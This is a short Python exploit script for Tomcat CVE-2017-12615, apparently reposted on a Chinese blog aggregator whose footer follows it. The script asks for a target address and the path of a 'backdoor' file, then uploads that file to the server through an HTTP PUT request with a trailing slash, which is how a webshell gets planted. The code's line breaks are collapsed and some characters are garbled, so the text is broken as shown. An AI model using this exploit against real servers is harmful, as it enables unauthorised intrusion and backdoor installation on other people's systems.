import sys import requestsdef title():print("[-------------------------------------------------------------]")print("[-------------- Tomcat 文件寫入漏洞 ---------------]")print("[-------- CVE-2017-12615 ----------]")print("[-------- use:python3 CVE-2017-12615.py --------]")print("[-------- Author:鳴蜩十四 ------------]")print("[-------------------------------------------------------------]")def main() :if (len(sys.argv)==1):url = input("請(qǐng)輸入目標(biāo)網(wǎng)站地址(http://ip:port/)：")name = input("請(qǐng)為上傳文件命名:")path = input("請(qǐng)輸入后門的絕對(duì)地址:")poc(url,name,path)else :print("Example: \n python3 " + sys.argv[0] + "\n")def poc(url,name,path) :r = requests.put(url=url+name+'/',data=open(path, 'rb'),verify=False)if r.status_code == 201 :print("[+] 可能存在 Tomcat寫入漏洞，請(qǐng)從網(wǎng)頁查看是否上傳成功")else :print("[-] 不存在該漏洞！")if __name__ == "__main__" :title()main()

總結(jié)

以上是生活随笔為你收集整理的Tomcat文件写入 CVE-2017-12615 EXP的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。